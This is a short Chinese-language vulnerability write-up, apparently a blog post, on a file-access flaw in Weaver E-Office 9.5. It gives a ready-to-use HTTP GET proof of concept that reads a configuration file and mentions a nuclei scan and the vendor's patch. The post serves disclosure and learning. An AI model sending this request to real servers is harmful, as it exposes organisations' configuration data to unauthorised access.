0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

0x01漏洞介绍

Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。

Weaver E-Office 9.5版本存在安全漏洞。攻击者利用该漏洞可以访问文件或目录。

0x02影响版本

Weaver E-Office 9.5版本

微信图片_20231109005016_副本.png

0x03漏洞复现

漏洞环境

微信图片_20231109005219_副本.png

2.对漏洞进行复现

POC (GET)

漏洞复现

GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

执行成功

微信图片_20231109005613_副本.png

3.nuclei测试(漏洞存在)

微信图片_20231109005714_副本.png

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://www.weaver.com.cn/